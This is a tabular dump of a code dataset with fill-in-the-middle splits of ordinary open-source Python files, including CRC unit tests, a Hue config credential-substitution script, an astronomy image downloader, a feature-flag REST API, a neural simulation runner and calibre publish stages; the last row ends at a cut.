repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (stringlengths 0-8.16k) | middle (stringlengths 3-512) | suffix (stringlengths 0-8.17k)
---|---|---|---|---|---|---|---|---
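Each data row below pairs a source file's metadata (the first six columns) with a fill-in-the-middle split of its contents: concatenating the prefix, middle, and suffix cells in order recovers the original file, which is reproduced after each metadata line. A minimal sketch of reassembling one row, assuming the rows are available as plain Python dicts keyed by the column names above; the helper name and the shortened sample values are illustrative, not taken from the dataset:

def reassemble(row):
    """Concatenate the fill-in-the-middle cells back into the full source file."""
    return row["prefix"] + row["middle"] + row["suffix"]

# Illustrative row, shaped like the first entry below (cell values shortened).
row = {
    "repo_name": "daniestevez/gr-satellites",
    "path": "python/qa_crc.py",
    "language": "Python",
    "license": "gpl-3.0",
    "size": 6774,
    "score": 0.0,
    "prefix": "#!/usr/bin/env python3\n# ...",
    "middle": "crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)",
    "suffix": "\n# ... remainder of the file\n",
}
full_source = reassemble(row)
print(len(full_source))  # total characters in the reassembled file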

daniestevez/gr-satellites | python/qa_crc.py | Python | gpl-3.0 | 6,774 | 0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Daniel Estevez <daniel@destevez.net>
#
# This file is part of gr-satellites
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, blocks, gr_unittest
import numpy as np
import pmt
# bootstrap satellites module, even from build dir
try:
import python as satellites
except ImportError:
pass
else:
import sys
sys.modules['satellites'] = satellites
from satellites import crc, crc_append, crc_check
class qa_crc(gr_unittest.TestCase):
def setUp(self):
"""Common part of all CRC tests
Creates a flowgraph, a Message Debug block, and a PDU
containing the numbers 0x00 through 0x0F.
"""
self.tb = gr.top_block()
self.dbg = blocks.message_debug()
self.data = list(range(16))
self.pdu = pmt.cons(pmt.PMT_NIL,
pmt.init_u8vector(len(self.data), self.data))
def run_crc_append(self, crc_params, crc_result):
"""Common part of CRC Append tests
Creates a CRC Append block with the specified crc_params parameters,
connects it to the Message Debug block, sends a test PDU to the
CRC Append block, and checks that the output PDU matches the expected
crc_result.
"""
crc_append_block = crc_append(*crc_params)
self.tb.msg_connect((crc_append_block, 'out'), (self.dbg, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out[:len(self.data)], self.data)
self.assertEqual(out[len(self.data):], crc_result)
def common_test_crc_check(self, matching_crc, header_bytes=0):
"""Common part of CRC Check tests
Creates a CRC Append block and a CRC Check block using either the
same CRC or a different one depending on whether matching_crc
is True or False. Connects CRC Append -> CRC Check -> Message Debug
and sends a PDU through. There are two message debugs to allow
checking whether the PDU ended up in the ok or fail port of the
CRC Check block.
"""
crc_append_block = crc_append(
16, 0x1021, 0x0, 0x0, False, False, False, header_bytes)
x = 0x0 if matching_crc else 0xFFFF
crc_check_block = crc_check(
16, 0x1021, x, x, False, False, False, True, header_bytes)
self.dbg_fail = blocks.message_debug()
self.tb.msg_connect((crc_append_block, 'out'), (crc_check_block, 'in'))
self.tb.msg_connect((crc_check_block, 'ok'), (self.dbg, 'store'))
self.tb.msg_connect((crc_check_block, 'fail'),
(self.dbg_fail, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
def test_crc_check(self):
"""Test a successful CRC check
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_header_bytes(self):
"""Test a successful CRC check (skipping some header bytes)
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True, header_bytes=5)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_wrong_crc(self):
"""Test a failed CRC check
Checks that the PDU ends in the fail port of CRC check
"""
self.common_test_crc_check(matching_crc=False)
self.assertEqual(self.dbg.num_messages(), 0)
self.assertEqual(self.dbg_fail.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg_fail.get_message(0)))
self.assertEqual(out, self.data)
def test_crc_append_crc16_ccitt_zero(self):
"""Test CRC-16-CCITT-Zero calculation"""
self.run_crc_append(
(16, 0x1021, 0x0, 0x0,
False, False, False),
[0x51, 0x3D])
def test_crc_append_crc16_ccitt_false(self):
"""Test CRC-16-CCITT-False calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0x0,
False, False, False),
[0x3B, 0x37])
def test_crc_append_crc16_ccitt_x25(self):
"""Test CRC-16-CCITT-X.25 calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0xFFFF,
True, True, False),
[0x13, 0xE9])
def test_crc_append_crc32(self):
"""Test CRC-32 calculation"""
self.run_crc_append(
(32, 0x4C11DB7, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xCE, 0xCE, 0xE2, 0x88])
def test_crc_append_crc32c(self):
"""Test CRC-32C calculation"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xD9, 0xC9, 0x08, 0xEB])
def test_crc_append_crc32c_endianness_swap(self):
"""Test CRC-32C calculation with endianness swapped"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, True),
[0xEB, 0x08, 0xC9, 0xD9])
def test_crc_append_crc32c_skip_header_bytes(self):
"""Test CRC-32C calculation skipping some header bytes"""
skip_bytes = 3
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False, skip_bytes),
[0xE8, 0x62, 0x60, 0x68])
class qa_crc_class(gr_unittest.TestCase):
def test_crc_crc32c(self):
"""Test CRC-32C calculation (using crc class directly)"""
c = crc(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF, True, True)
out = c.compute(list(range(16)))
self.assertEqual(c.compute(list(range(16))),
0xD9C908EB)
if __name__ == '__main__':
gr_unittest.run(qa_crc)
gr_unittest.run(qa_crc_class)

vmanoria/bluemix-hue-filebrowser | update-hue-ini.py | Python | gpl-2.0 | 1,829 | 0.02515
## update-hue-ini.py
##
## This script will extract the appropriate IBM Analytics for Apache Hadoop credentials from the VCAP_SERVICES
## environment variable inside a running container. It will add the username and password to the hue.ini file
## so that the hue application has access to a specific instance
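## Illustrative only -- the VCAP_SERVICES document is assumed (from the lookups
## below) to contain the service name "Analytics for Apache Hadoop" and the
## credential keys "userid", "password" and "WebhdfsUrl", roughly like:
## {
##   "Analytics for Apache Hadoop": [
##     {"credentials": {"userid": "...", "password": "...",
##                      "WebhdfsUrl": "https://example.com/webhdfs/v1"}}
##   ]
## }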
import sys
import os
import json
username = None
password = None
webhdfsurl = None
srcfile = sys.argv[1]
destfile = sys.argv[2]
if "VCAP_SERVICES" in os.environ:
vcaps = json.loads(os.environ["VCAP_SERVICES"])
if "Analytics for Apache Hadoop" in vcaps:
username = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["userid"]
password = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["password"]
webhdfsurl = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["WebhdfsUrl"]
else:
if "WEBHDFS_USER" in os.environ:
username=os.environ["WEBHDFS_USER"]
if "WEBHDFS_PASSWORD" in os.environ:
password=os.environ["WEBHDFS_PASSWORD"]
if "WEBHDFS_URL" in os.environ:
webhdfsurl=os.environ["WEBHDFS_URL"]
if (username is not None and password is not None and webhdfsurl is not None):
filedata = None
with open (srcfile,'r') as file:
filedata = file.read()
filedata = filedata.replace('%instance_user%', username)
filedata = filedata.replace('%instance_user_password%', password)
filedata = filedata.replace('%webhdfs_url%', webhdfsurl)
with open (destfile,'w') as file:
file.write(filedata)
sys.exit(0)
else:
sys.stderr.write('Fatal error: cannot find Web HDFS credentials and/or endpoint\n')
if username is None:
sys.stderr.write('username missing\n')
if password is None:
sys.stderr.write('password missing\n')
if webhdfsurl is None:
sys.stderr.write('URL endpoint missing\n')
sys.exit(1)

blackball/an-test6 | util/usnob_get_region.py | Python | gpl-2.0 | 3,265 | 0.033691
#! /usr/bin/env python
from urllib2 import urlopen
from urllib import urlencode
from urlparse import urlparse, urljoin
import os.path
from numpy import *
from astrometry.util.file import *
from astrometry.util.usnob_get_image import *
from optparse import OptionParser
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-r', '--ra-low', '--ra-lo', '--ra-min',
dest='ralo', type=float, help='Minimum RA')
parser.add_option('-R', '--ra-high', '--ra-hi', '--ra-max',
dest='rahi', type=float, help='Maximum RA')
parser.add_option('-d', '--dec-low', '--dec-lo', '--dec-min',
dest='declo', type=float, help='Minimum Dec')
parser.add_option('-D', '--dec-high', '--dec-hi', '--dec-max',
dest='dechi', type=float, help='Maximum Dec')
parser.add_option('-p', '--prefix',
dest='prefix', help='Output file prefix')
parser.add_option('-s', '--survey',
dest='survey', help='Grab only one USNOB survey: poss-i, poss-ii, ... (see http://www.nofs.navy.mil/data/fchpix/cfch.html')
parser.add_option('-P', '--plate',
dest='plate', help='Grab only one USNOB plate: "se0161", for example')
parser.add_option('-c', '--continue',
dest='cont', action='store_true', help='Continue a previously interrupted transfer')
parser.set_defaults(prefix='usnob', survey=None, plate=None,
ralo=None, rahi=None, declo=None, dechi=None, cont=False)
(opt, args) = parser.parse_args()
if opt.ralo is None or opt.rahi is None or opt.declo is None or opt.dechi is None:
parser.print_help()
parser.error('RA,Dec lo,hi are required.')
radecs = []
decstep = 14./60.
Dec = arange(opt.declo, opt.dechi+decstep, decstep)
for dec in Dec:
rastep = 14./60./cos(deg2rad(dec))
RA = arange(opt.ralo , opt.rahi +rastep , rastep)
for ra in RA:
radecs.append((ra,dec))
radecs = array(radecs)
# Retrieve them in order of distance from the center of the region...
#dists = [distsq_between_radecs(r,d, (opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
# for (r,d) in radecs]
dists = distsq_between_radecs(radecs[:,0], radecs[:,1],
(opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
order = argsort(dists)
for (ra,dec) in radecs[order]:
(jpeg,fits) = get_usnob_images(ra, dec, fits=True, survey=opt.survey, justurls=True)
print 'got jpeg urls:', jpeg
print 'got fits urls:', fits
if opt.plate is None:
keepjpeg = jpeg
keepfits = fits
else:
keepjpeg = [u for u in jpeg if opt.plate in u]
keepfits = [u for u in fits if opt.plate in u]
print 'keep jpeg urls:', keepjpeg
print 'keep fits urls:', keepfits
base = opt.prefix + '-%.3f-%.3f-' % (ra,dec)
for url in keepjpeg:
# like "fchlwFxSl_so0194.000.jpg"
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
for url in keepfits:
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn + '.fits'
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)

endlessm/chromium-browser | tools/swarming_client/third_party/infra_libs/infra_types/__init__.py | Python | bsd-3-clause | 327 | 0
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra_libs.infra_types.infra_types import freeze
from infra_libs.infra_types.infra_types import thaw
from infra_libs.infra_types.infra_types import FrozenDict

CianciuStyles/project-euler | 011.py | Python | mit | 1,763 | 0.028361
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
product = reduce(lambda x,y: x*y, matrix[row][col:col+4])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = max(product, max_product)
return max_product
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store it in an integer 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
print("The solution took %.4f seconds to compute." % (done - start))

pombredanne/flagon | src/flagon/status_api/__init__.py | Python | mit | 3,360 | 0
# The MIT License (MIT)
#
# Copyright (c) 2014 Steve Milner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Status API for flags.
"""
import json
from werkzeug.wrappers import Request, Response
from werkzeug.routing import Map, Rule
from werkzeug.exceptions import HTTPException, NotFound
from flagon.errors import UnknownFeatureError
class FlagonStatusAPI(object):
"""
Simple Flag status read-only REST api.
"""
_url_map = Map([
Rule('/v0/<flag>', endpoint='flag_status')
])
def __init__(self, backend):
"""
Creates the API object. Requires a pre-configured backend.
"""
self._backend = backend
def wsgi_app(self, environ, start_response):
"""
The WSGI App entry point.
"""
request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
def dispatch_request(self, request):
"""
Dispatcher for requests. Uses the _url_map to find the
proper view to call.
"""
adapter = self._url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return getattr(self, endpoint)(request, **values)
except HTTPException, e:
return e
def __call__(self, environ, start_response):
"""
Callable interface which forwards to wsgi_app.
"""
return self.wsgi_app(environ, start_response)
# VIEWS
def flag_status(self, request, flag):
response = Response(content_type='application/json')
response.headers.add_header(
'Cache-Control', 'no-cache, no-store, must-revalidate')
try:
active = self._backend.is_active(flag)
response.data = json.dumps({
'active': bool(active), 'known': True})
response.status_code = 200
return response
except UnknownFeatureError:
response.data = json.dumps({
'active': False, 'known': False})
response.status_code = 404
return response
def run_local_test_server(backend):
"""
Runs a local test server using the given backend.
"""
from werkzeug.serving import run_simple
run_simple('127.0.0.1', 5000, FlagonStatusAPI(backend))

MattNolanLab/ei-attractor | grid_cell_model/simulations/common/simulation_stationary.py | Python | gpl-3.0 | 3,476 | 0.000575
'''Main simulation run: Simulation of a stationary bump.'''
from __future__ import absolute_import, print_function, division
from numpy.random import choice
from nest.hl_api import NESTError
from grid_cell_model.models.parameters import getOptParser
from grid_cell_model.models.gc_net_nest import BasicGridCellNetwork
from grid_cell_model.models.seeds import TrialSeedGenerator
from grid_cell_model.parameters.data_sets import DictDataSet
from grid_cell_model.visitors.spikes import SpikeStatsVisitor
from grid_cell_model.visitors.signals import AutoCorrelationVisitor
from simtools.storage import DataStorage
def signal_analysis(data):
'''Run the signal analysis visitors on a single data trial.
Parameters
----------
data : dict
A dictionary containing data of one trial.
Returns
-------
data : dict
Input data modified in-situ.
'''
monName = 'stateMonF_e'
stateList = ['I_clamp_GABA_A']
dummy_data_set = DictDataSet(data)
stats_visitor_e = SpikeStatsVisitor("spikeMon_e", forceUpdate=False)
ac_visitor = AutoCorrelationVisitor(monName, stateList, forceUpdate=False)
stats_visitor_e.visitDictDataSet(dummy_data_set)
ac_visitor.visitDictDataSet(dummy_data_set)
# Clean the state monitor
data['stateMonF_e'] = [data['stateMonF_e'][0]]
return data
parser = getOptParser()
(options, args) = parser.parse_args()
output_fname = "{0}/{1}job{2:05}_output.h5".format(options.output_dir,
options.fileNamePrefix,
options.job_num)
d = DataStorage.open(output_fname, 'a')
if "trials" not in d.keys():
d['trials'] = []
seed_gen = TrialSeedGenerator(int(options.master_seed))
overalT = 0.
###############################################################################
for trial_idx in range(len(d['trials']), options.ntrials):
print("\n\t\tStarting trial no. {0}\n".format(trial_idx))
seed_gen.set_generators(trial_idx)
d['master_seed'] = int(options.master_seed)
d['invalidated'] = 1
try:
ei_net = BasicGridCellNetwork(options, simulationOpts=None)
const_v = [0.0, 0.0]
ei_net.setConstantVelocityCurrent_e(const_v)
stateRecF_e = choice(ei_net.E_pop, options.gammaNSample, replace=False)
stateRecF_i = choice(ei_net.I_pop, options.gammaNSample, replace=False)
stateMonF_e_params = {
'withtime': False,
'interval': options.sim_dt * 10,
'record_from': ['I_clamp_GABA_A']
}
stateMonF_e = ei_net.getGenericStateMonitor(stateRecF_e,
stateMonF_e_params,
'stateMonF_e')
d['net_params'] = ei_net.getNetParams() # Common settings will stay
d.flush()
ei_net.simulate(options.time, printTime=options.printTime)
ei_net.endSimulation()
d['trials'].append(signal_analysis(ei_net.getAllData()))
d.flush()
constrT, simT, totalT = ei_net.printTimes()
overalT += totalT
except NESTError as e:
print("Simulation interrupted. Message: {0}".format(str(e)))
print("Trying to save the simulated data if possible...")
break
d.close()
print("Script total run time: {0} s".format(overalT))
###############################################################################

ffunenga/virtuallinks | tests/core/test_installing.py | Python | mit | 2,693 | 0
import pytest
import os
import shutil
import core
virtuallinks = core.import_package('virtuallinks')
def setup_function(function):
shutil.rmtree('temporary', ignore_errors=True)
os.mkdir('temporary')
os.chdir('temporary')
def teardown_function(function):
os.chdir('..')
shutil.rmtree('temporary', ignore_errors=True)
def test_unmonitor_fail():
with pytest.raises(KeyError):
virtuallinks.unmonitor('open')
def test_monitor_double_unmonitor():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
virtuallinks.monitor('open')
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_unmonitor_double():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_after_inspector(capsys):
virtuallinks.enable_inspector()
virtuallinks.monitor('open')
out, err = capsys.readouterr()
assert out == ''
assert err == ''
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
def _test_monitor_inspector_interleaved_0(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
with open('file.txt', 'w') as f:
f.write('')
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_1(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_2(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_3(capsys):
virtuallinks.monitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
virtuallinks.unmonitor_all()
virtuallinks.unlink_all()

stefanbraun-private/pyVisiToolkit | src/trend/datasource/trendfile.py | Python | gpl-3.0 | 49,022 | 0.023622
#!/usr/bin/env python
# encoding: utf-8
"""
trend.datasource.trendfile.py
Handling and parsing of trendfiles (*.hdb)
Copyright (C) 2016/2017 Stefan Braun
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
import datetime
import calendar
from trend.datasource.dbdata import HighLevelDBData as DBData
from trend.datasource.dbdata import HighLevelDBData2 as DBData2
import configparser
import string
import re
import collections
import misc.timezone as timezone
import itertools
from operator import itemgetter
DEBUGGING = True
class DBData_Timestamp_Search_Result(object):
"""
contains lists of DBData elements after search for a specific point of time:
-exact: elements with equal timestamps
if "exact"-list is empty, then these lists help to calculate values in between:
-before: elements with same timestamps before point of time
-after: elements with same timestamps after point of time
"""
def __init__(self):
self.before_list = []
self.exact_list = []
self.after_list = []
def set_before(self, before_list):
self.before_list = before_list
def set_exact(self, exact_list):
self.exact_list = exact_list
def set_after(self, after_list):
self.after_list = after_list
def get_trendfile_structure_obj(file_fullpath):
"""
returns appropriate structure for accessing all DBData elements
(ctypes.Structure doesn't allow unknown amounts of elements)
"""
DMSDP_NOF_BYTES = 83 # based on observations made in class "PDBSData" (pdbsdata.py)
TRENDDATA_OFFSET = 1024 # based on reverse engineering the *.hdb file format
filesize = os.path.getsize(file_fullpath)
# DBData could be ProMoS NT(c) version 1.x or version 2 =>choosing right version
# trendfiles v1.x ends with ".hdb" , v2.x ends with ".hdbx"
file_ext = file_fullpath.split('.')[-1]
if file_ext.upper() == u'HDB':
# using ProMoS NT(c) version 1.x
curr_DBData_class = DBData
else:
# using ProMoS NT(c) version 2.x
curr_DBData_class = DBData2
nof_dbdata_elems = (filesize - TRENDDATA_OFFSET) / ctypes.sizeof(curr_DBData_class)
class Trendfile_structure(ctypes.LittleEndianStructure):
"""
Header contains DMS datapoint name,
data section contains all DBData elements, amount depends on filesize...
"""
# contains some hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
_fields_ = [
("dmsDatapoint", ctypes.c_char * DMSDP_NOF_BYTES), # DMS datapoint name
("UNKNOWN_BYTES", ctypes.c_char * (TRENDDATA_OFFSET - DMSDP_NOF_BYTES)), # perhaps unused
("dbdata", curr_DBData_class * nof_dbdata_elems) # array of DBData elements
]
# return an instance to caller
return Trendfile_structure()
class RawTrendfile(object):
def __init__(self, fileFullpath):
self._fileFullpath = fileFullpath
self._trendstruct = get_trendfile_structure_obj(self._fileFullpath)
self._parseFile_()
def _parseFile_(self):
# reading binary trendfile into ctypes structure
# contains hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
with open(self._fileFullpath, "rb") as f:
f.readinto(self._trendstruct)
def get_dms_Datapoint(self):
return self._trendstruct.dmsDatapoint
def get_nof_dbdata_elements(self):
return len(self._trendstruct.dbdata)
def get_first_timestamp(self):
return self._trendstruct.dbdata[0].get_datetime()
def get_last_timestamp(self):
return self._trendstruct.dbdata[-1].get_datetime()
def get_dbdata_elements_generator(self, start_datetime=None, end_datetime=None):
"""
a generator for memory efficient retrieving DBData elements
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
"""
# FIXME: implement some filtering (same as in "trendfile.py.old"?) Or is further filtering done in HighLevelTrendfile?
for elem in self._trendstruct.dbdata:
ignore = False
if start_datetime:
if elem.get_datetime() < start_datetime:
ignore = True
if end_datetime:
if elem.get_datetime() > end_datetime:
ignore = True
if not ignore:
yield elem
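# Illustrative usage only (the file path is hypothetical):
#   tf = RawTrendfile(r'C:\trend\MSR01_Temp.hdb')
#   for dbdata in tf.get_dbdata_elements_generator():
#       print(dbdata.get_datetime())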
def get_dbdata_elements_as_set(self):
"""
returns DBData elements in a set()
"""
# FIXME: should we improve this code? How can we get good performance in Megabytes of trenddata?
# FIXME: Should we save the set() for next function execution, or does we allow altering of trenddata in-memory?
return set(self._trendstruct.dbdata)
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
"""
# FIXME: method works as expected, but we should find a cleaner solution...
search_result = DBData_Timestamp_Search_Result()
# begin and end indeces of three lists don't overlap: [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# based on examples from https://docs.python.org/2/library/bisect.html
idx_bisect_left = self._get_bisect_left(timestamp_datetime)
# based on example: "Locate the leftmost value exactly equal to x"
# =>collecting all DBData elements with given timestamp
if idx_bisect_left == len(self._trendstruct.dbdata):
# special case: timestamp is higher than highest DBData-timestamp
# =>do workaround: taking last element and continue processing...
curr_elem = self._trendstruct.dbdata[-1]
else:
curr_elem = self._trendstruct.dbdata[idx_bisect_left]
if idx_bisect_left != len(self._trendstruct.dbdata) and curr_elem.get_datetime() == timestamp_datetime:
# we found "exact_begin"
# appending all elements with same timestamp
idx = idx_bisect_left
exact_timestamp = curr_elem.get_datetime()
while idx < len(self._trendstruct.dbdata):
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == exact_timestamp:
search_result.exact_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
else:
# no exact search hits found... =>populating list "before"
if idx_bisect_left > 0:
idx = idx_bisect_left - 1
before_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx >= 0:
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == before_timestamp:
search_result.before_list.append(self._trendstruct.dbdata[idx])
idx = idx - 1
else:
break
# ... and populating list "after"
# based on example "Find leftmost value greater than x"
idx_bisect_right = self._get_bisect_right(timestamp_datetime)
if idx_bisect_right != len(self._trendstruct.dbdata):
idx = idx_bisect_right
after_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx < len(self._trendstruct.dbdata):
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == after_timestamp:
search_result.after_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
return search_result
def _get_bisect_left(self, timestamp_datetime):
"""
returns index of DBData element with exact timestamp or later
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DB

FRidh/python-acoustics | tests/test_decibel.py | Python | bsd-3-clause | 451 | 0.019956
from acoustics.decibel import *
def test_dbsum():
assert(abs(dbsum([10.0, 10.0]) - 13.0103) < 1e-5)
def test_dbmean():
assert(dbmean([10.0, 10.0]) == 10.0)
def test_dbadd():
assert(abs(dbadd(10.0, 10.0) - 13.0103) < 1e-5)
def test_dbsub():
assert(abs(dbsub(13.0103, 10.0) - 10.0) < 1e-5)
def test_dbmul():
assert(abs(dbmul(10.0, 2) - 13.0103) < 1e-5)
def test_dbdiv():
assert(abs(dbdiv(13.0103, 2) - 10.0) < 1e-5)

yeyanchao/calibre | setup/publish.py | Python | gpl-3.0 | 3,819 | 0.008117
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, shutil, subprocess, glob
from setup import Command, __appname__, __version__
class Stage1(Command):
description = 'Stage 1 of the publish process'
sub_commands = [
'check',
'pot',
'build',
'resources',
'translations',
'iso639',
'gui',
]
class Stage2(Command):
description = 'Stage 2 of the publish process'
sub_commands = ['linux', 'win', 'osx']
def pre_sub_commands(self, opts):
for x in glob.glob(os.path.join(self.d(self.SRC), 'dist', '*')):
os.remove(x)
build = os.path.join(self.d(self.SRC), 'build')
if os.path.exists(build):
shutil.rmtree(build)
class Stage3(Command):
description = 'Stage 3 of the publish process'
sub_commands = ['upload_user_manual', 'upload_demo', 'sdist', 'tag_release']
class Stage4(Command):
description = 'Stage 4 of the publish process'
sub_commands = ['upload_installers']
class Stage5(Command):
description = 'Stage 5 of the publish process'
